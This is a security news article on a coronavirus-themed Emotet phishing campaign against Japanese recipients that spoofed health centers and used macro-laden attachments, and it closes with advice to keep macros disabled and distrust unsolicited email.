- Crooks are taking advantage of the people’s concern around the coronavirus, and trick them into opening Emotet infecting files.
- The scammers have done a good job of imitating healthcare centers and national welfare service providers.
- Right now, the target audience is people from Japan, but as the 2019-nCOV spreads, more countries will receive such emails.
People from Japan report that they are receiving emails that warn them of coronavirus infection risks in their area, scaring them into opening the accompanying attachments that deliver malware payloads. The actors are looking to exploit the fear around the breakout of the 2019-nCOV virus that has already infected almost eight thousand people and killed 170. Scammers are always ready to take advantage of any situation, be it the tensions between the US and Iran, the tax season, or the Christmas holiday. They are always quick to create a narrow-themed campaign that features all the bells and whistles required for the trickery.
— Cryptolaemus (@Cryptolaemus1) January 29, 2020
In the case of the coronavirus, the scammers have created documents that use the letterheads of the Japanese disability welfare service provider and of various public health centers. The message claims that the document contains details on how to protect against coronavirus infections, but the recipients will only get a file ridden with malicious macros that will trigger a PowerShell command to fetch and install the Emotet payload. The various malware strains used in this campaign include the Trickbot info stealer, which can also serve as a channel to download ransomware.
Many users report that the emails that are used in this campaign belong to compromised accounts, and that the actors have put in some effort to make the emails convincing. For example, they are using Japanese in the subject as well as in the document filenames, so as to increase the chances of the recipient getting fooled. Even the email content itself has been carefully crafted to look legitimate, and the footer of the email is using the actual signature details from the health institute that is spoofed.
As the coronavirus infection rates continue to rise, we expect that tailored Emotet distribution campaigns will pullulate. In this case, the actors started with Japan because the country is in close proximity to the source of the coronavirus. The next countries that are about to face serious infection rate problems will also be the targets of scammers. What you can do in order to stay safe from this type of campaigns is to keep your macros disabled on your office suite, and never to enable them just to see what an email attachment contains. Whenever you receive an unsolicited email message, always treat is as a potential risk. In the end, important official warnings from national agencies are not distributed in the form of emails, but are instead published on the official web portals and communicated on the media.